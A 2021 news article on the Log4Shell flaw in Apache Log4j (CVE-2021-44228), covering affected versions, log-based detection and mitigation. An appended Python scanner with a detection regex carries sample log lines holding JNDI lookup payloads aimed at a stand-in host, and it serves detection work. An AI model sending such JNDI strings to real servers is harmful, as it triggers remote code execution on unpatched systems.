Java logging library Apache Log4j is found with easy-to-exploit vulnerability

December 15, 2021

Reports reveal a zero-day vulnerability in the Java logging library Apache Log4j, tracked as CVE-2021-44228, which threat actors could find easy to exploit since it allows them to take control of affected servers.

The Java logging library vulnerability is classified as severe because it allows unauthenticated remote code execution with the privileges of the account that runs the application using Log4j. Several security experts have warned that the vulnerability is already being exploited in the wild. They have also advised administrators and users to apply the recommended mitigations quickly to avoid further damage.


The affected systems and services include any that use the Java logging library Apache Log4j in versions 2.0 to 2.14.1. Many applications and servers written in Java are therefore impacted.


Many cloud applications, such as Apple iCloud and Steam, were also found to be affected by the vulnerability, along with the game Minecraft, whose developers are said to have patched their servers already.

Threat actors are also exploiting the vulnerability in enterprise applications, so experts expect to find further products exposed to attack as they learn more about it. Another security expert noted that users of Apache Struts may also be vulnerable.

The security firm who found the Java logging library vulnerability explained that its impact is severe because of how widespread it is among users and how easily it can be exploited. They also dubbed the vulnerability ‘Log4Shell’.

Firms that may be affected are advised to identify the threat within their servers by examining the log files of any application that uses the vulnerable Log4j versions. CERT NZ, for example, recommends searching logs for the user-controlled string ‘jndi:ldap’; any match indicates that the firm may be one of those affected by the vulnerability.

To mitigate the vulnerability once it has been discovered within a system, admins must set the log4j2.formatMsgNoLookups property to true by adding “-Dlog4j2.formatMsgNoLookups=true” to the JVM command line (this property is only honoured by Log4j 2.10 and later).

However, preventing an attack is more important than mitigating one after it has happened. That is why experts recommend upgrading Log4j quickly to log4j-2.15.0-rc1.

Firms that believe the Java logging library vulnerability might affect them should adopt a breach mentality and immediately review all log files on their servers for unusual or malicious activity. If unexpected activity is found, firms are strongly encouraged to treat it as an active incident and respond with the appropriate security measures.
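The log review described above, as an added example that is not part of the original article: a small Python scanner that flags log lines containing a ‘jndi:ldap’ (or ‘jndi:ldaps’) lookup string, case-insensitively, and extracts the host the lookup points at so responders can block it and pivot on it. The sample access-log lines are constructed for illustration and use documentation address ranges.

```python
import re
from typing import Iterable, List, NamedTuple

# Case-insensitive match for a JNDI LDAP/LDAPS lookup embedded in a log line.
# Group 1 captures the host[:port] the lookup points at.
JNDI_LDAP = re.compile(r"\$\{jndi:ldaps?://([^/\s}]+)", re.IGNORECASE)


class Hit(NamedTuple):
    line_no: int   # 1-based line number in the scanned input
    host: str      # host[:port] the lookup would contact, lower-cased
    line: str      # the offending log line, without trailing newline


def find_jndi_lookups(lines: Iterable[str]) -> List[Hit]:
    """Return every line that carries a ${jndi:ldap...} lookup string."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_LDAP.search(line)
        if m:
            hits.append(Hit(n, m.group(1).lower(), line.rstrip()))
    return hits


def scan_file(path: str) -> List[Hit]:
    """Scan a log file on disk; tolerate non-UTF-8 bytes rather than abort."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return find_jndi_lookups(f)


# Constructed sample lines in combined access-log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:02:33 +0000] "GET /login HTTP/1.1" 200 873 "-" "${JNDI:LDAP://evil.example:1389/x}"',
    '203.0.113.9 - - [10/Dec/2021:10:03:00 +0000] "POST /api HTTP/1.1" 204 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit.line_no}: JNDI lookup to {hit.host}")
```

Run `scan_file` over each application's log files; every hit is a line to treat as an exploitation attempt and its host as an indicator for blocking and further investigation.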
